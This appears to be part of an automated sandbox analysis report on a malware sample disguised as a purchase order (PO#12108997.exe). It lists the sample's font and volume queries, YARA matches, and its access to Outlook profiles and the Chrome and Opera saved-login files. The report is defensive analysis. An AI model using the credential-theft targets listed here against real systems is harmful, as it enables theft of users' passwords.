Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\PO#12108997.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality

Source: Yara match File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY